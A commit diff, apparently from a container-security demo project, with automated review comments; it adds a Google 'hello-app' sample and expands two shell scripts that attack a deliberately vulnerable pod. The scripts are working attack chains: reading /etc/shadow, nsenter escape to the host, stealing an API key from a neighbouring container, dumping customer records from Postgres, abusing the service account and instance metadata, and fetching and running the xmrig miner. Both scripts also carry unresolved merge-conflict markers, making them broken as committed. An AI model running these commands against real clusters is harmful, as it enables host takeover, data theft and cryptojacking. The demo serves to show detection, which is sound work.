
Commit ec4d8fb

1 parent 34cecd4 commit ec4d8fb


10 files changed

+466
-3
lines changed


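--- a/docker-build-hello-app/Dockerfile
+++ b/docker-build-hello-app/Dockerfile
@@ -0,0 +1,26 @@
+# Copyright 2022 Google LLC
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+FROM golang:1.20.4 as builder
+WORKDIR /app
+RUN go mod init hello-app
+COPY *.go ./
+RUN CGO_ENABLED=0 GOOS=linux go build -o /hello-app
+
+FROM gcr.io/distroless/base-debian11
+WORKDIR /
+COPY --from=builder /hello-app /hello-app
+ENV PORT 8080
+USER nonroot:nonroot
+CMD ["/hello-app"]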
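Review bot: The runtime stage's `FROM gcr.io/distroless/base-debian11` on line 21 carries no tag or digest, so every rebuild can pull a different base image; pin it by digest, e.g. `FROM gcr.io/distroless/base-debian11@sha256:<digest-placeholder>`, and consider doing the same for `golang:1.20.4`. Because the binary is built with `CGO_ENABLED=0`, `gcr.io/distroless/static-debian11` would probably be sufficient and ships less userland. `RUN go mod init hello-app` generates the module file inside the build, so no go.mod or go.sum is committed and reviewed; that is harmless while main.go imports only the standard library, but the files should be checked in as soon as a dependency is added.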

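--- a/docker-build-hello-app/README.md
+++ b/docker-build-hello-app/README.md
@@ -0,0 +1 @@
+Cloned from https://github.com/GoogleCloudPlatform/kubernetes-engine-samples/tree/main/hello-app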

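--- a/docker-build-hello-app/build.sh
+++ b/docker-build-hello-app/build.sh
@@ -0,0 +1,10 @@
+docker buildx create --name mybuilder --bootstrap --use
+docker buildx build --push \
+--platform linux/arm64,linux/amd64 \
+--tag jasonumiker/hello-app:190523 \
+.
+docker buildx build --push \
+--platform linux/arm64,linux/amd64 \
+--tag jasonumiker/hello-app:latest \
+.
+docker buildx rm mybuilder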
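Review bot: The script has no shebang and no `set -euo pipefail`, so a failed `docker buildx create` or a failed first build does not stop the second build and push; start the file with `#!/usr/bin/env bash` and `set -euo pipefail`. The two `docker buildx build --push` invocations also build the image twice, and because the Dockerfile's runtime base is not pinned, the `190523` and `latest` tags can end up pointing at different contents. A single invocation carrying both `--tag jasonumiker/hello-app:190523` and `--tag jasonumiker/hello-app:latest` pushes one manifest under both names.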

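--- a/docker-build-hello-app/main.go
+++ b/docker-build-hello-app/main.go
@@ -0,0 +1,54 @@
+/**
+* Copyright 2021 Google Inc.
+*
+* Licensed under the Apache License, Version 2.0 (the "License");
+* you may not use this file except in compliance with the License.
+* You may obtain a copy of the License at
+*
+* http://www.apache.org/licenses/LICENSE-2.0
+*
+* Unless required by applicable law or agreed to in writing, software
+* distributed under the License is distributed on an "AS IS" BASIS,
+* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+* See the License for the specific language governing permissions and
+* limitations under the License.
+*/
+
+// [START gke_hello_app]
+// [START container_hello_app]
+package main
+
+import (
+"fmt"
+"log"
+"net/http"
+"os"
+)
+
+func main() {
+// register hello function to handle all requests
+mux := http.NewServeMux()
+mux.HandleFunc("/", hello)
+
+// use PORT environment variable, or default to 8080
+port := os.Getenv("PORT")
+if port == "" {
+port = "8080"
+}
+
+// start the web server on port and accept requests
+log.Printf("Server listening on port %s", port)
+log.Fatal(http.ListenAndServe(":"+port, mux))
+}
+
+// hello responds to the request with a plain-text "Hello, world" message.
+func hello(w http.ResponseWriter, r *http.Request) {
+log.Printf("Serving request: %s", r.URL.Path)
+host, _ := os.Hostname()
+fmt.Fprintf(w, "Hello, world!\n")
+fmt.Fprintf(w, "Version: 1.0.0\n")
+fmt.Fprintf(w, "Hostname: %s\n", host)
+}
+
+// [END container_hello_app]
+// [END gke_hello_app]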
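Review bot: `http.ListenAndServe(":"+port, mux)` on line 41 runs the default server, which sets no read, write or idle timeouts, so a slow or stalled client can hold a connection open indefinitely. Construct the server explicitly, e.g. `srv := &http.Server{Addr: ":" + port, Handler: mux, ReadHeaderTimeout: 5 * time.Second}` followed by `log.Fatal(srv.ListenAndServe())`; this needs `time` in the import block, and the 5s value is only illustrative. In `hello`, `log.Printf("Serving request: %s", r.URL.Path)` writes a client-controlled path into the log verbatim, and switching the verb to `%q` keeps embedded newlines from forging log entries. The error from `os.Hostname()` is discarded with `_` and no comment explains why that is acceptable.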

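--- a/example-curls-nodrift.sh
+++ b/example-curls-nodrift.sh
@@ -1,44 +1,118 @@
-#!/bin/bash
+#!/usr/bin/env bash
 # Script to demonstrate how to interact with security-playground
 
 NODE_IP=$(kubectl get nodes -o wide | awk 'FNR == 2 {print $6}')
 NODE_PORT=30002
+HELLO_NAMESPACE=hello
 
+<<<<<<< HEAD
+# Try to reach hello-server for our NetworkPolicy example later
+curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=curl http://hello-server.$HELLO_NAMESPACE.svc:8080" > /dev/null
+
+echo "1. Read a sensitive file (/etc/shadow)"
+echo "--------------------------------------------------------------------------------"
+=======
 echo "1. Read a sensitive file (/etc/shadow)"
+>>>>>>> 34cecd4dc9f8ce5f5e1283f43884e70cd43effb7
 curl $NODE_IP:$NODE_PORT/etc/shadow
+echo "--------------------------------------------------------------------------------"
+sleep 10
+
 
 echo "2. Exploit writing to /bin"
+echo "--------------------------------------------------------------------------------"
 curl -X POST $NODE_IP:$NODE_PORT/bin/hello -d 'content=echo "hello-world"'
 echo ""
 echo "and then set it to be executable"
 curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=chmod 0755 /bin/hello'
 echo "and then run it"
 curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=hello'
+echo "--------------------------------------------------------------------------------"
+sleep 10
 
 echo "3. Install nmap from apt and then run a scan"
+<<<<<<< HEAD
+echo "--------------------------------------------------------------------------------"
+=======
+>>>>>>> 34cecd4dc9f8ce5f5e1283f43884e70cd43effb7
 curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=apt-get update; apt-get -y install nmap;nmap -v scanme.nmap.org'
+echo "--------------------------------------------------------------------------------"
+sleep 10
 
 echo "4. Break out of our Linux namespace to the host's with nsenter and install crictl in /usr/bin"
+<<<<<<< HEAD
+echo "--------------------------------------------------------------------------------"
+ARCH=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=dpkg --print-architecture')
+curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 wget -q https://github.com/kubernetes-sigs/cri-tools/releases/download/v1.27.1/crictl-v1.27.1-linux-$ARCH.tar.gz"
+curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 tar -zxvf crictl-v1.27.1-linux-$ARCH.tar.gz -C /usr/bin"
+echo "--------------------------------------------------------------------------------"
+sleep 10
+
+echo "5. Break out of our Linux namespace to the host's with nsenter and talk directly to the container runtime"
+echo "--------------------------------------------------------------------------------"
+=======
 ARCH=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=dpkg --print-architecture')
 curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 wget -q https://github.com/kubernetes-sigs/cri-tools/releases/download/v1.26.1/crictl-v1.26.1-linux-$ARCH.tar.gz"
 curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 tar -zxvf crictl-v1.26.1-linux-$ARCH.tar.gz -C /usr/bin"
 
 echo "5. Break out of our Linux namespace to the host's with nsenter and talk directly to the container runtime"
+>>>>>>> 34cecd4dc9f8ce5f5e1283f43884e70cd43effb7
 curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=nsenter --all --target=1 crictl ps'
+echo "--------------------------------------------------------------------------------"
+sleep 10
 
+<<<<<<< HEAD
+echo "6. Steal a secret from another container on the same Node (hello-client in the $HELLO_NAMESPACE Namespace)"
+echo "--------------------------------------------------------------------------------"
+HELLO_ID=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=nsenter --all --target=1 crictl ps --name hello-client -q')
+HELLO_ID_1=`echo "${HELLO_ID}" | head -1`
+curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 crictl exec $HELLO_ID_1 /bin/sh -c set" | grep API_KEY
+echo "--------------------------------------------------------------------------------"
+sleep 10
+
+echo "7. Exfil some data from another container running on the same Node"
+echo "--------------------------------------------------------------------------------"
+=======
 echo "6. Steal a secret from another container on the same Node (hello-client-allowed in the team1 Namespace)"
 HELLO_ID=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=nsenter --all --target=1 crictl ps --name hello-client-allowed -q')
 curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 crictl exec $HELLO_ID /bin/sh -c set" | grep API_KEY
 
 echo "7. Exfil some data from another container running on the same Node"
+>>>>>>> 34cecd4dc9f8ce5f5e1283f43884e70cd43effb7
 POSTGRES_ID=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=nsenter --all --target=1 crictl ps --name postgres-sakila -q')
 curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 crictl exec $POSTGRES_ID psql -U postgres -c 'SELECT c.first_name, c.last_name, c.email, a.address, a.postal_code FROM customer c JOIN address a ON (c.address_id = a.address_id)'"
+echo "--------------------------------------------------------------------------------"
+sleep 10
+
+<<<<<<< HEAD
+echo "8. Call the Kubernetes API via security-playground's K8s ServiceAccount"
+echo "--------------------------------------------------------------------------------"
+curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=curl -O https://s3.us-west-2.amazonaws.com/amazon-eks/1.27.1/2023-04-19/bin/linux/$ARCH/kubectl"
+curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=chmod 0755 ./kubectl'
+curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=./kubectl create deployment nefarious-workload --image=public.ecr.aws/m9h2b5e7/security-playground:270723'
+curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=./kubectl get pods'
+echo "--------------------------------------------------------------------------------"
+sleep 10
 
+echo "9. Call the Node's Instance Metadata Endpoint from the security-playground container"
+echo "--------------------------------------------------------------------------------"
+curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=curl curl http://169.254.169.254/latest/meta-data/iam/info'
+echo "--------------------------------------------------------------------------------"
+sleep 10
+
+echo "10. Download and run a common crypto miner (xmrig)"
+echo "--------------------------------------------------------------------------------"
+=======
 echo "8. Download and run a common crypto miner (xmrig)"
+>>>>>>> 34cecd4dc9f8ce5f5e1283f43884e70cd43effb7
 if [[ "$ARCH" == "amd64" ]]; then
 curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=wget https://github.com/xmrig/xmrig/releases/download/v6.20.0/xmrig-6.20.0-linux-static-x64.tar.gz -O xmrig.tar.gz"
 else
 curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=wget https://z9k65lokhn70.s3.amazonaws.com/xmrig-6.20.0-linux-static-arm64.tar.gz -O xmrig.tar.gz"
 fi
 curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=tar -xzvf xmrig.tar.gz'
+<<<<<<< HEAD
+curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=xmrig-6.20.0/xmrig'
+=======
 curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=xmrig-6.20.0/xmrig'
+>>>>>>> 34cecd4dc9f8ce5f5e1283f43884e70cd43effb7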
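Review bot: Unresolved merge conflict markers are committed as script content: `<<<<<<< HEAD`, `=======` and `>>>>>>> 34cecd4dc9f8ce5f5e1283f43884e70cd43effb7` are added in six regions starting at new lines 8, 34, 43, 64, 87 and 114. Both sides of every conflict are therefore in the file, so the step headings are duplicated, both the v1.27.1 and v1.26.1 crictl URLs are present, and the marker lines themselves are fed to bash as commands. Resolve each region to one side and delete the markers before this is used in a demo. Line 99 also repeats the command name in `command=curl curl http://...`. The same markers and the doubled `curl` appear in example-curls-restricted.sh.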

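--- a/example-curls-restricted.sh
+++ b/example-curls-restricted.sh
@@ -1,44 +1,118 @@
-#!/bin/bash
+#!/usr/bin/env bash
 # Script to demonstrate how to interact with security-playground
 
 NODE_IP=$(kubectl get nodes -o wide | awk 'FNR == 2 {print $6}')
 NODE_PORT=30001
+HELLO_NAMESPACE=hello
 
+<<<<<<< HEAD
+# Try to reach hello-server for our NetworkPolicy example later
+curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=curl http://hello-server.$HELLO_NAMESPACE.svc:8080" > /dev/null
+
+echo "1. Read a sensitive file (/etc/shadow)"
+echo "--------------------------------------------------------------------------------"
+=======
 echo "1. Read a sensitive file (/etc/shadow)"
+>>>>>>> 34cecd4dc9f8ce5f5e1283f43884e70cd43effb7
 curl $NODE_IP:$NODE_PORT/etc/shadow
+echo "--------------------------------------------------------------------------------"
+sleep 10
+
 
 echo "2. Exploit writing to /bin"
+echo "--------------------------------------------------------------------------------"
 curl -X POST $NODE_IP:$NODE_PORT/bin/hello -d 'content=echo "hello-world"'
 echo ""
 echo "and then set it to be executable"
 curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=chmod 0755 /bin/hello'
 echo "and then run it"
 curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=hello'
+echo "--------------------------------------------------------------------------------"
+sleep 10
 
 echo "3. Install nmap from apt and then run a scan"
+<<<<<<< HEAD
+echo "--------------------------------------------------------------------------------"
+=======
+>>>>>>> 34cecd4dc9f8ce5f5e1283f43884e70cd43effb7
 curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=apt-get update; apt-get -y install nmap;nmap -v scanme.nmap.org'
+echo "--------------------------------------------------------------------------------"
+sleep 10
 
 echo "4. Break out of our Linux namespace to the host's with nsenter and install crictl in /usr/bin"
+<<<<<<< HEAD
+echo "--------------------------------------------------------------------------------"
+ARCH=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=dpkg --print-architecture')
+curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 wget -q https://github.com/kubernetes-sigs/cri-tools/releases/download/v1.27.1/crictl-v1.27.1-linux-$ARCH.tar.gz"
+curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 tar -zxvf crictl-v1.27.1-linux-$ARCH.tar.gz -C /usr/bin"
+echo "--------------------------------------------------------------------------------"
+sleep 10
+
+echo "5. Break out of our Linux namespace to the host's with nsenter and talk directly to the container runtime"
+echo "--------------------------------------------------------------------------------"
+=======
 ARCH=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=dpkg --print-architecture')
 curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 wget -q https://github.com/kubernetes-sigs/cri-tools/releases/download/v1.26.1/crictl-v1.26.1-linux-$ARCH.tar.gz"
 curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 tar -zxvf crictl-v1.26.1-linux-$ARCH.tar.gz -C /usr/bin"
 
 echo "5. Break out of our Linux namespace to the host's with nsenter and talk directly to the container runtime"
+>>>>>>> 34cecd4dc9f8ce5f5e1283f43884e70cd43effb7
 curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=nsenter --all --target=1 crictl ps'
+echo "--------------------------------------------------------------------------------"
+sleep 10
 
+<<<<<<< HEAD
+echo "6. Steal a secret from another container on the same Node (hello-client in the $HELLO_NAMESPACE Namespace)"
+echo "--------------------------------------------------------------------------------"
+HELLO_ID=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=nsenter --all --target=1 crictl ps --name hello-client -q')
+HELLO_ID_1=`echo "${HELLO_ID}" | head -1`
+curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 crictl exec $HELLO_ID_1 /bin/sh -c set" | grep API_KEY
+echo "--------------------------------------------------------------------------------"
+sleep 10
+
+echo "7. Exfil some data from another container running on the same Node"
+echo "--------------------------------------------------------------------------------"
+=======
 echo "6. Steal a secret from another container on the same Node (hello-client-allowed in the team1 Namespace)"
 HELLO_ID=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=nsenter --all --target=1 crictl ps --name hello-client-allowed -q')
 curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 crictl exec $HELLO_ID /bin/sh -c set" | grep API_KEY
 
 echo "7. Exfil some data from another container running on the same Node"
+>>>>>>> 34cecd4dc9f8ce5f5e1283f43884e70cd43effb7
 POSTGRES_ID=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=nsenter --all --target=1 crictl ps --name postgres-sakila -q')
 curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 crictl exec $POSTGRES_ID psql -U postgres -c 'SELECT c.first_name, c.last_name, c.email, a.address, a.postal_code FROM customer c JOIN address a ON (c.address_id = a.address_id)'"
+echo "--------------------------------------------------------------------------------"
+sleep 10
+
+<<<<<<< HEAD
+echo "8. Call the Kubernetes API via security-playground's K8s ServiceAccount"
+echo "--------------------------------------------------------------------------------"
+curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=curl -O https://s3.us-west-2.amazonaws.com/amazon-eks/1.27.1/2023-04-19/bin/linux/$ARCH/kubectl"
+curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=chmod 0755 ./kubectl'
+curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=./kubectl create deployment nefarious-workload --image=public.ecr.aws/m9h2b5e7/security-playground:270723'
+curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=./kubectl get pods'
+echo "--------------------------------------------------------------------------------"
+sleep 10
 
+echo "9. Call the Node's Instance Metadata Endpoint from the security-playground container"
+echo "--------------------------------------------------------------------------------"
+curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=curl curl http://169.254.169.254/latest/meta-data/iam/info'
+echo "--------------------------------------------------------------------------------"
+sleep 10
+
+echo "10. Download and run a common crypto miner (xmrig)"
+echo "--------------------------------------------------------------------------------"
+=======
 echo "8. Download and run a common crypto miner (xmrig)"
+>>>>>>> 34cecd4dc9f8ce5f5e1283f43884e70cd43effb7
 if [[ "$ARCH" == "amd64" ]]; then
 curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=wget https://github.com/xmrig/xmrig/releases/download/v6.20.0/xmrig-6.20.0-linux-static-x64.tar.gz -O xmrig.tar.gz"
 else
 curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=wget https://z9k65lokhn70.s3.amazonaws.com/xmrig-6.20.0-linux-static-arm64.tar.gz -O xmrig.tar.gz"
 fi
 curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=tar -xzvf xmrig.tar.gz'
+<<<<<<< HEAD
+curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=xmrig-6.20.0/xmrig'
+=======
 curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=xmrig-6.20.0/xmrig'
+>>>>>>> 34cecd4dc9f8ce5f5e1283f43884e70cd43effb7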
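Review bot: This file's new side is the same as example-curls-nodrift.sh apart from `NODE_PORT=30001` on line 5, so every correction has to be made in two places and the copies can drift apart. A single script that takes the port as its argument, for example `NODE_PORT="${1:?usage: $0 <node-port>}"`, would keep the two demos in step; the two existing file names could remain as thin wrappers that pass 30001 and 30002.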
